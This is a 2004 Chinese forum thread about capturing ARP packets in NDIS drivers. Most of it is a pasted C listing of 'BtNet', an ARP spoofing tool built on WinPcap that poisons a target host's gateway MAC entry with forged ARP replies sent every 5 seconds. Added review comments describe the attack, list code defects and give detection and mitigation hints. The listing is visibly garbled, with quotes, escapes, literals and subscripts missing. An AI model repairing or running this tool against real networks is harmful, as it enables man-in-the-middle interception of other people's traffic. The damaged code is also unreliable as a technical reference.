慎重,arp的问题。
在协议驱动程序中,能捕获 ARP 包吗?
在中间驱动程序中,能捕获 ARP 包吗?
沙发#
发布于:2004-04-09 17:02
> 在协议驱动程序中,能捕获 ARP 包吗?
> 在中间驱动程序中,能捕获 ARP 包吗?

都能!
板凳#
发布于:2004-04-09 17:06
不丢包吗?
地板#
发布于:2004-04-12 11:16
首先,能。然后,这是从网上找的 ARP 欺骗程序,编译的时候总是提示缺少 "packet32.h",请问高手这是怎么回事?
/*
 * BtNet (name taken from its own usage banner): an ARP spoofing tool written
 * against the WinPcap packet.dll API (the Packet* calls), as pasted into the
 * forum post.
 *
 * NOTE(review): the forum rendering damaged this listing. Quote characters
 * carry a stray backslash, escape sequences lost theirs ("n" where a newline
 * was presumably meant), character literals are missing, and several array
 * accesses appear to have lost their subscript. It does not compile as shown.
 * The code below is left exactly as posted; only line breaks, indentation and
 * comments were added.
 *
 * What the visible code puts on the wire:
 *   1. Three broadcast ARP requests (own IP, the -h host, the -o host) while a
 *      sniffer thread records the MAC address from each matching ARP reply.
 *      The first two requests use sender IP 128.128.128.128 and a sender MAC
 *      filled with 0xa5 (presumably all six bytes).
 *   2. Then, every 5 seconds, an ARP reply addressed to the -h host that pairs
 *      the -o (gateway) IP with either the -h host's own MAC or the MAC given
 *      with -m.
 *
 * Defender's view: a host that accepts these replies holds a wrong MAC for its
 * gateway for as long as the tool runs. Things to look for: unsolicited ARP
 * replies recurring at a fixed ~5 s interval, an ARP reply whose sender and
 * target hardware addresses are identical, a gateway IP whose MAC changes, and
 * ARP requests from a5-a5-a5-a5-a5-a5 / 128.128.128.128. Switch-side ARP
 * validation (for example Dynamic ARP Inspection backed by DHCP snooping) or a
 * static ARP entry for the gateway on critical hosts blunts it.
 */
#include \"packet32.h\"
#include \"ntddndis.h\"
#include <stdio.h>
#include <conio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib,\"ws2_32\")
#pragma comment(lib,\"packet\")

#define ETH_IP 0x0800
#define ETH_ARP 0x0806
#define ARP_REQUEST 0x0001 // ARP request packet
#define ARP_REPLY 0x0002 // ARP reply packet
#define ARP_HARDWARE 0x0001
#define max_num_adapter 10

#pragma pack(push,1)
/* Ethernet header, byte-packed so it can be overlaid on captured frames. */
typedef struct ethdr
{
    unsigned char eh_dst[6]; // Ethernet destination address
    unsigned char eh_src[6]; // Ethernet source address
    unsigned short eh_type; // EtherType; compared against htons(ETH_ARP) in sniff()
}ETHDR,*PETHDR;

typedef struct arphdr // ARP header
{
    unsigned short arp_hdr; // hardware type
    unsigned short arp_pro; // protocol type
    unsigned char arp_hln; // hardware address length
    unsigned char arp_pln; // protocol address length
    unsigned short arp_opt; // operation; set to ARP_REQUEST or ARP_REPLY via htons()
    unsigned char arp_sha[6]; // sender Ethernet address
    unsigned long arp_spa; // sender IP address (layout assumes a 4-byte unsigned long)
    unsigned char arp_tha[6]; // target Ethernet address
    unsigned long arp_tpa; // target IP address
}ARPHDR,*PARPHDR;

/* One IP address together with the MAC address learned for it. */
typedef struct ip_mac
{
    u_long ip;
    unsigned char mac[6];
}IP_MAC,*PIP_MAC;
// NOTE(review): this pushes the packing state again instead of restoring it, so
// 1-byte packing stays in effect for everything below; a pop was presumably intended.
#pragma pack(push)

// Shared state. These globals are written by the sniffer thread and read by the
// sender and timer threads with no lock or atomic access visible in this listing.
LPADAPTER lpAdapter;
char adapterlist[max_num_adapter][1024];
IP_MAC toipandmac;            // the -h host
IP_MAC oipandmac,myipandmac;  // the -o host, and this machine
BOOL param6=FALSE;            // TRUE once a -m argument has been parsed
char *noMACstr;
char noMAC[6][3];
u_long mytoIP,oIP;
BOOL sendtoOip;
MSG msg;
UINT newtimer;
char MYIP[20]=\"128.128.128.128\";  // sender IP placed in the first ARP requests
BOOL toipandmac_flag=FALSE,myipandmac_flag=FALSE,oipandmac_flag=FALSE;

/*
 * Maps one hexadecimal digit character to its numeric value; returns -1 when
 * the character matches none of the three ranges tested.
 * NOTE(review): the quotes around the character literals were dropped by the
 * page, so the comparisons below no longer read as character constants.
 */
int getint(char c)
{
    int t=-1;
    if((c<=9)&&(c>=0))
        t=c-0;
    else if((c>=a)&&(c<=f))
        t=10+c-a;
    else if((c>=A)&&(c<=F))
        t=10+c-A;
    return t;
}

/* Prints the banner, usage line and examples; called by main() on bad arguments. */
void start()
{
    printf(\"BtNet //--an ARP Tool test the Windows Break the Internetn\");
    printf(\"written by Ruder,10/2003n\");
    printf(\"Homepage: http://xEyes.cdut.net/ruder/index.htm;n\");
    printf(\"E-mail: cocoruder@163.comn\");
    printf(\"nUsage: BtNet -h attackIP -o gateIP [-m spoofedMAC]n\");
    printf(\"Example:n\");
    printf(\"BtNet -h 202.115.138.12 -o 202.115.138.1n\");
    printf(\"BtNet -h 202.115.138.12 -o 202.115.138.1 -m 00-50-fc-6a--6b--7cn\");
    printf(\" Warning: You must have installed the winpcap_2.3 or winpcap_3.0_alphan\");
    return ;
}

/*
 * Thread routine: captures frames on lpAdapter and, for each ARP reply whose
 * sender IP equals one of the three tracked addresses, prints the pair and
 * stores the frame's Ethernet source address as that host's MAC. Returns 0 on
 * a key press, on a capture error, or once all three MACs are known.
 */
DWORD WINAPI sniff(LPVOID)
{
    LPPACKET lppackets,lpPacketr;
    char recvbuf[1024*250];  // 250 KB automatic array, i.e. on this thread's stack
    ULONG ulbytesreceived,off;
    ETHDR *eth;
    ARPHDR *arp;
    char *buf,*pChar,*base;
    char szTemp[20];
    struct bpf_hdr *hdr;

    // NOTE(review): lppackets is allocated here but not used or freed anywhere
    // in the visible code.
    if((lppackets=PacketAllocatePacket())==FALSE)
    {
        printf(\"PacketAllocatePacket send Error: %dn\",GetLastError());
        return 0;
    }
    // Promiscuous mode is requested; failure only prints a warning.
    if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
    {
        printf(\"Warning: Unable to set the adapter to promiscuous moden\");
    }
    if(PacketSetBuff(lpAdapter,500*1024)==FALSE)
    {
        printf(\"PacketSetBuff Error: %dn\",GetLastError());
        return 0;
    }
    if(PacketSetReadTimeout(lpAdapter,1)==FALSE)
    {
        printf(\"Warning: Unable to set the timeoutn\");
    }
    // NOTE(review): lpPacketr is not released on any of the return paths below.
    if((lpPacketr=PacketAllocatePacket())==FALSE)
    {
        printf(\"PacketAllocatePacket receive Error: %dn\",GetLastError());
        return 0;
    }
    PacketInitPacket(lpPacketr,(char *)recvbuf,sizeof(recvbuf));

    while(!kbhit())
    {
        if(PacketReceivePacket(lpAdapter,lpPacketr,TRUE)==FALSE)
        {
            return 0;
        }
        //getdata(lppacketr,option);
        ulbytesreceived=lpPacketr->ulBytesReceived;
        buf=(char *)lpPacketr->Buffer;
        off=0;
        // One read can return several frames, each preceded by a bpf_hdr.
        while(off<ulbytesreceived)
        {
            if(kbhit())
            {
                return 0;
            }
            hdr=(struct bpf_hdr *)(buf+off);
            off+=hdr->bh_hdrlen;
            pChar=(char *)(buf+off);
            base=pChar;
            off=Packet_WORDALIGN(off+hdr->bh_caplen);
            // NOTE(review): bh_caplen is never compared with
            // sizeof(ETHDR)+sizeof(ARPHDR) before these casts, so a short
            // captured frame is read past its end.
            eth=(PETHDR)pChar; // Ethernet header
            arp=(PARPHDR)(pChar+sizeof(ETHDR)); // ARP header
            int i;
            if((eth->eh_type==htons(ETH_ARP))&& (arp->arp_opt==htons(ARP_REPLY)))
            {
                //if (arp->arp_tpa==htonl(ntohl(inet_addr(MYIP))))
                {
                    // All three MACs already learned: nothing left to capture.
                    if(oipandmac_flag&&myipandmac_flag&&toipandmac_flag)
                        return 0;
                    // Only react to a tracked IP whose MAC has not been recorded yet.
                    if (((toipandmac.ip==htonl(arp->arp_spa))&&(toipandmac_flag==FALSE)) ||((myipandmac.ip==htonl(arp->arp_spa))&&(myipandmac_flag==FALSE)) ||((oipandmac.ip==htonl(arp->arp_spa))&&(oipandmac_flag==FALSE)))
                    {
                        memset(szTemp,0,sizeof(szTemp));
                        memcpy(szTemp,&arp->arp_spa,sizeof(arp->arp_spa));
                        printf(\"[IP]:\");
                        printf(\"%s\",inet_ntoa(*((struct in_addr *)szTemp)));
                        printf(\"[MAC]:\");
                        // The MAC is taken from the Ethernet source field, not
                        // from the ARP sender hardware address.
                        for(i=0;i<5;i++)
                        {
                            printf(\"%.2x-\",eth->eh_src);
                        }
                        printf(\"%.2x\",eth->eh_src[5]);
                        printf(\"n\");
                        if (toipandmac.ip==htonl(arp->arp_spa))
                        {
                            for(i=0;i<6;i++)
                                toipandmac.mac=eth->eh_src;
                            toipandmac_flag=TRUE;
                        }
                        if (oipandmac.ip==htonl(arp->arp_spa))
                        {
                            for(i=0;i<6;i++)
                                oipandmac.mac=eth->eh_src;
                            oipandmac_flag=TRUE;
                            // printf(\"if you have get the MAC Addresses enough,Press any key for staring!n\");
                        }
                        if(myipandmac.ip==htonl(arp->arp_spa))
                        {
                            for(i=0;i<6;i++)
                                myipandmac.mac=eth->eh_src;
                            myipandmac_flag=TRUE;
                        }
                    }
                }
            }
            continue;
        }
    }
    return 0;
}

/*
 * Thread routine: sends one ARP request for the IP that dwsendtoIP points to
 * (host byte order, converted with htonl below). While sendtoOip is FALSE the
 * request carries the 0xa5 filler MAC and MYIP as sender; once it is TRUE the
 * sender fields come from myipandmac instead.
 */
DWORD WINAPI sendARPPacket(LPVOID dwsendtoIP)
{
    LPPACKET lpPacket;
    ETHDR eth;
    ARPHDR arphdr;
    int i;
    char szPacketBuf[600];
    u_long sendtoIP=*(u_long *)dwsendtoIP;
    //struct sockaddr_in sin;

    lpPacket = PacketAllocatePacket();
    if(lpPacket==NULL)
    {
        printf(\"nPacketAllocatePacket error!\");
        return 0;
    }
    eth.eh_type=htons(ETH_ARP);
    // Destination/target 0xff, source/sender 0xa5 (subscripts appear to be
    // missing from the posted text).
    for(i=0;i<6;i++)
    {
        eth.eh_dst=0xff;
        eth.eh_src=0xa5;
        arphdr.arp_sha=0xa5;
        arphdr.arp_tha=0xff;
    }
    arphdr.arp_hdr=htons(ARP_HARDWARE);
    arphdr.arp_pro=htons(ETH_IP);
    arphdr.arp_opt=htons(ARP_REQUEST);
    arphdr.arp_hln=6;
    arphdr.arp_pln=4;
    arphdr.arp_tpa=htonl(sendtoIP);
    arphdr.arp_spa=htonl(ntohl(inet_addr(MYIP)));
    if(sendtoOip)
    {
        // Reads myipandmac, which the sniffer thread may still be writing.
        if(myipandmac_flag)
        {
            for(i=0;i<6;i++)
            {
                eth.eh_src=myipandmac.mac;
                arphdr.arp_sha=myipandmac.mac;
                arphdr.arp_spa=htonl(myipandmac.ip);
                //memset(MYIP,0,sizeof(MYIP));
            }
        }
        else
        {
            // NOTE(review): lpPacket is not freed on this path.
            printf(\"My MAC Address Cant Find!n\");
            return 0;
        }
    }
    memset(szPacketBuf,0,sizeof(szPacketBuf));
    memcpy(szPacketBuf,e,sizeof(ETHDR));
    memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));
    // 60 bytes are sent; the headers are shorter and the rest is the zero fill above.
    PacketInitPacket(lpPacket,szPacketBuf,60);
    if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
    {
        printf(\"warning: Unable to send more than one packet in a single write!n\");
    }
    if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
    {
        printf(\"Error sending the packets!n\");
        PacketFreePacket(lpPacket);
        return 0;
    }
    PacketFreePacket(lpPacket);
    return 0;
}

/*
 * Timer callback (installed by sendSRTimer): builds and sends one ARP reply
 * to mytoIP with oIP as the sender IP. The sender hardware address is the -m
 * MAC when param6 is set, otherwise the recipient's own MAC, then the function
 * prints what was sent.
 * NOTE(review): it is registered through a TIMERPROC cast although it takes no
 * parameters, so its signature does not match what the timer will call.
 */
DWORD WINAPI sendSR()
{
    ETHDR eth;
    ARPHDR arphdr;
    int i;
    char szPacketBuf[600];
    LPPACKET lpPacket;
    unsigned char toMAC[6];
    struct sockaddr_in sin;
    u_long toIP=mytoIP;

    //if ((myipandmac_flag==FALSE)||(oipandmac_flag==FALSE)||(toipandmac_flag==FALSE))
    //{
    // printf(\"Cant get all MAC address!n\");
    // return 0;
    //}
    lpPacket = PacketAllocatePacket();
    if(lpPacket == NULL)
    {
        printf(\"nError:failed to allocate the LPPACKET structure.n\");
        return 0;
    }
    // Nothing is sent until the sniffer has learned the -h host's MAC.
    // NOTE(review): lpPacket leaks on this return and on the -m error return
    // below, and this callback fires every 5 seconds.
    if (toipandmac_flag==FALSE)
    {
        printf(\"Cant get toMAC address!n\");
        return 0;
    }
    memset(toMAC,0,sizeof(toMAC));
    memcpy(toMAC,&toipandmac.mac,sizeof(toipandmac.mac));
    if (param6)
    {
        // -m given: each byte of the source/sender MAC is built from two hex
        // digits taken from noMAC.
        for(i=0;i<6;i++)
        {
            int t1,t2;
            char c1,c2;
            c1=noMAC[0];
            c2=noMAC[1];
            t1=getint(c1);
            t2=getint(c2);
            if((t1==-1)||(t2==-1))
            {
                printf(\"-m parameter error!n\");
                return 0;
            }
            eth.eh_src=t1*16+t2;
            eth.eh_dst=toMAC;
            arphdr.arp_sha=t1*16+t2;
            arphdr.arp_tha=toMAC;
        }
    }
    else
    {
        // No -m: source, destination, sender and target are all set from toMAC.
        for(i=0;i<6;i++)
        {
            eth.eh_src=toMAC;
            eth.eh_dst=toMAC;
            arphdr.arp_sha=toMAC;
            arphdr.arp_tha=toMAC;
        }
    }
    eth.eh_type=htons(ETH_ARP);
    arphdr.arp_spa=htonl(oIP);
    arphdr.arp_tpa=htonl(toIP);
    arphdr.arp_hdr=htons(ARP_HARDWARE);
    arphdr.arp_pro=htons(ETH_IP);
    arphdr.arp_opt=htons(ARP_REPLY);
    arphdr.arp_hln=6;
    arphdr.arp_pln=4;
    memset(szPacketBuf,0,sizeof(szPacketBuf));
    memcpy(szPacketBuf,e,sizeof(ETHDR));
    memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));
    PacketInitPacket(lpPacket,szPacketBuf,60);
    if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
    {
        printf(\"warning: Unable to send more than one packet in a single write!n\");
    }
    if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
    {
        printf(\"Error sending the packets!n\");
        PacketFreePacket(lpPacket);
        return 0;
    }
    PacketFreePacket(lpPacket);
    // Console log of the reply just sent: recipient IP, claimed IP, claimed MAC.
    sin.sin_addr.s_addr=arphdr.arp_tpa;
    printf(\"spoof %s: \",inet_ntoa(sin.sin_addr));
    sin.sin_addr.s_addr=arphdr.arp_spa;
    printf(\"%s-->\",inet_ntoa(sin.sin_addr));
    for(i=0;i<5;i++)
        printf(\"%.2x-\",arphdr.arp_sha);
    printf(\"%x\",arphdr.arp_sha[5]);
    printf(\"n\");
    return 0;
}

/*
 * Thread routine: stores the IP that dwtoIP points to in mytoIP, installs a
 * 5-second timer whose callback is sendSR, and runs a message loop so the
 * timer messages are dispatched. The loop ends only when GetMessage returns 0.
 */
DWORD WINAPI sendSRTimer(LPVOID dwtoIP)
{
    printf(\"Waiting spoof Startn\");
    mytoIP=*(u_long *)dwtoIP;
    newtimer=SetTimer(NULL,NULL,5*1000,TIMERPROC(sendSR));
    while(GetMessage(&msg,0,0,0))
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
    return 0;
}

/*
 * Entry point. Expects "-h <ip> -o <ip>" with an optional "-m <mac>", lets the
 * user pick a capture adapter, prints the adapter's address information, then
 * starts the sniffer, sends the three ARP requests and finally hands over to
 * the periodic reply thread. Returns 0 after usage or normal exit, -1 on
 * adapter errors.
 */
int main(int argc,char *argv[])
{
    HANDLE thread1,thread2,thread3;
    WCHAR adaptername[8192];
    WCHAR *name1,*name2;
    ULONG adapterlength;
    DWORD threadid1,threadid2,threadid3;
    u_long toIP,myip;
    struct NetType ntype;
    struct sockaddr_in sin;
    struct npf_if_addr ipbuff;
    int adapternum=0,opti=0,open,i,j;
    long npflen;

    if((argc!=5)&&(argc!=7))
    {
        start();
        return 0;
    }
    else if((strcmp(argv[1],\"-h\")!=0)||(strcmp(argv[3],\"-o\")!=0))
    {
        start();
        return 0;
    }
    // NOTE(review): the inet_addr() results are not checked, so a malformed
    // address is used as whatever value inet_addr() returns for it.
    toIP=ntohl(inet_addr(argv[2]));
    oIP=ntohl(inet_addr(argv[4]));
    // With argc==5, argv[5] is the terminating NULL, so this test is safe.
    if (argv[5]!=NULL)
    {
        if (strcmp(argv[5],\"-m\")==0)
        {
            // NOTE(review): reads two characters at a stride of three from
            // argv[6] without checking its length; a short -m value is read
            // past its terminator.
            noMACstr=argv[6];
            j=0;
            for(i=0;i<6;i++)
            {
                memset(noMAC,0,sizeof(noMAC));
                memcpy(noMAC,noMACstr,2);
                noMACstr=noMACstr+3;
            }
            param6=TRUE;
        }
    }
    printf(\"nLibarary Version: %s\",PacketGetVersion());
    adapterlength=sizeof(adaptername);
    if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE) // get the adapter list
    {
        printf(\"PacketGetAdapterNames Error: %dn\",GetLastError());
        return -1;
    }
    // Splits the returned name list into adapterlist entries (the terminator
    // literals are missing from the posted text).
    // NOTE(review): neither the entry count (max_num_adapter) nor the 1024-byte
    // entry size is checked while copying.
    name1=adaptername;
    name2=adaptername;
    i=0;
    while((*name1!=) || (*(name1-1)!=))
    {
        if(*name1==)
        {
            memcpy(adapterlist,name2,2*(name1-name2));
            name2=name1+1;
            i++;
        }
        name1++;
    }
    adapternum=i;
    printf(\"nAdapters Installed:n\");
    for(i=0;i<adapternum;i++)
        wprintf(L\"%d - %sn\",i+1,adapterlist);
    // NOTE(review): the scanf() result is ignored; on non-numeric input `open`
    // stays uninitialized and the loop cannot make progress.
    do
    {
        printf(\"nSelect the number of the adapter to open: \");
        scanf(\"%d\",&open);
        if(open>=1 && open<=adapternum)
            break;
    }while(open<1 || open>adapternum);
    lpAdapter=PacketOpenAdapter(adapterlist[open-1]);
    if(!lpAdapter || (lpAdapter->hFile==INVALID_HANDLE_VALUE))
    {
        printf(\"PacketOpenAdapter Error: %dn\",GetLastError());
        return -1;
    }
    if(PacketGetNetType(lpAdapter,&ntype))
    {
        printf(\"ntt*** Host Information ***n\");
        printf(\"[LinkTpye:]t%dtt\",ntype.LinkType);
        printf(\"[LinkSpeed:]t%d b/sn\",ntype.LinkSpeed);
    }
    npflen=sizeof(ipbuff);
    if(PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen))
    {
        sin=*(struct sockaddr_in *)&(ipbuff.Broadcast);
        printf(\"[Broadcast:]t%.16st\",inet_ntoa(sin.sin_addr));
        sin=*(struct sockaddr_in *)&(ipbuff.SubnetMask);
        printf(\"[SubnetMask:]t%.16sn\",inet_ntoa(sin.sin_addr));
        sin=*(struct sockaddr_in *)&(ipbuff.IPAddress);
        printf(\"[IPAddress:]t%.16st\",inet_ntoa(sin.sin_addr));
        // The adapter's own IP, kept in host byte order like toIP and oIP.
        myip=ntohl(sin.sin_addr.s_addr);
        printf(\"[MACAddress:]\");
    }
    else
    {
        printf(\"nNot get enough datan\");
        //PacketFreePacket(lppackets);
        PacketCloseAdapter(lpAdapter);
        return -1;
    }
    printf(\"n\");
    oipandmac.ip=oIP;
    toipandmac.ip=toIP;
    myipandmac.ip=myip;
    sendtoOip=FALSE;
    // The sniffer starts first so it can see the replies to the requests below.
    // Ordering between the threads relies on the Sleep() calls alone.
    thread1=CreateThread(NULL,0,sniff,NULL,0,&threadid1);
    Sleep(300);
    thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&myip,0,&threadid2);
    Sleep(100);
    CloseHandle(thread2);
    thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&toIP,0,&threadid2);
    Sleep(10);
    CloseHandle(thread2);
    // From here on sendARPPacket uses the learned local IP/MAC as sender.
    sendtoOip=TRUE;
    Sleep(200);
    thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&oIP,0,&threadid2);
    Sleep(10);
    CloseHandle(thread2);
    // WaitForSingleObject(thread1,INFINITE);
    thread3=CreateThread(NULL,0,sendSRTimer,(LPVOID)&toIP,0,&threadid3);
    // main blocks here for as long as the timer thread's message loop runs.
    WaitForSingleObject(thread3,INFINITE);
    PacketCloseAdapter(lpAdapter);
    return 0;
}